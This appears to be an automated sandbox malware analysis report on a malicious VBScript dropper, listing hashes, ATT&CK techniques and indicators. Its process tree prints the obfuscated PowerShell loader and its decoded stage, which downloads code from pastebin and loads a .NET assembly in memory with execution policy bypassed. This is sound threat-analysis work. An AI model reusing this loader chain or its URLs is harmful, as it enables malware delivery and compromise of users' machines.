1e4e9e146859519cb79e73ba0fd928e42b8be7a8c7ebc18db9338c39c60a24da

General

Target

cdff410d32d5b177320f80eb8bc6be51de994bd11cc17e7013ae400e1947ca6f.vbs
Size

1.9MB
MD5

753a9d435fdf6803ca970ba23d3dfe0d
SHA1

03aa37de89660b8d2fd9ef5aabc61a83a7f410c8
SHA256

cdff410d32d5b177320f80eb8bc6be51de994bd11cc17e7013ae400e1947ca6f
SHA512

426a53f1003bd48f4933266eecfeedfe74ea374a50b1b9ff2d969dc0333e4a9370ccb75640e08bcd0e93a3b2e9d0bbf60a5ed7fc117fef79e1f54f53c9a44c6a
SSDEEP

192:dG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4GAG4l:XQb7SOE9Cm6wn

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/Adv9gBHa

exe.dropper

https://pastebin.com/raw/Adv9gBHa

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1128	powershell.exe
7	1128	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1288	powershell.exe
1128	powershell.exe
2168	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
5	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1288	powershell.exe
1128	powershell.exe
2168	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 1288	2380	WScript.exe	28
PID 2380 wrote to memory of 1288	2380	WScript.exe	28
PID 2380 wrote to memory of 1288	2380	WScript.exe	28
PID 1288 wrote to memory of 1128	1288	powershell.exe	30
PID 1288 wrote to memory of 1128	1288	powershell.exe	30
PID 1288 wrote to memory of 1128	1288	powershell.exe	30
PID 1128 wrote to memory of 2168	1128	powershell.exe	31
PID 1128 wrote to memory of 2168	1128	powershell.exe	31
PID 1128 wrote to memory of 2168	1128	powershell.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cdff410d32d5b177320f80eb8bc6be51de994bd11cc17e7013ae400e1947ca6f.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★QQBk★HY★OQBn★EI★S★Bh★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★FQ★ZQBo★HU★b★Bj★Gg★ZQBz★Fg★e★BY★Hg★e★★u★EM★b★Bh★HM★cw★x★Cc★Jw★g★Ck★LgBH★GU★d★BN★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBl★HQ★a★Bv★GQ★K★★g★Cc★JwBN★HM★cQBC★Ek★YgBZ★Cc★Jw★g★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★C★★J★Bu★HU★b★Bs★C★★L★★g★Fs★bwBi★Go★ZQBj★HQ★WwBd★F0★I★★o★C★★Jw★n★D★★LwBV★Fg★VQBW★Dc★LwBk★C8★ZQBl★C4★ZQB0★HM★YQBw★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\cdff410d32d5b177320f80eb8bc6be51de994bd11cc17e7013ae400e1947ca6f.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/Adv9gBHa' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''TehulchesXxXxx.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/UXUV7/d/ee.etsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\cdff410d32d5b177320f80eb8bc6be51de994bd11cc17e7013ae400e1947ca6f.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
1KB

MD5
95bb4c8ed642dba5737403594a869a5d

SHA1
6d03cfb99e43f58841b92d9540514a3a8d9443a3

SHA256
f16c773365cf2883b116bc674e1214ee1a793fe3148ab720c6c1d6c2ff422be8

SHA512
edae5274f900ee2b1540225ba581ff7852ba87132db4b4dfdf5241e692edd776aabcbf0f788127fe744c3194deb6b82c34422a762dd317e95ee61f22eac1b154

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
037328c2746993527e3c8cb0792597fe

SHA1
69ba2bd61e023cb39c8a8e46323cddc8c8dcefe8

SHA256
1d68fcd043adc1809749b20ccea6be1eb9c8224aa720f3ea3b8b594a488f8449

SHA512
94e39c10895d40591a4357661ecc265fd754775535c1e3af58af0895140b50876961cc22f1272feda65e6245a822ea044bf4b57661d0d2f73ae2365a0407281c

Download Submit
memory/1288-4-0x000007FEF5ACE000-0x000007FEF5ACF000-memory.dmp

Filesize
4KB

Download
memory/1288-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/1288-7-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1288-10-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-9-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-8-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-11-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1288-28-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing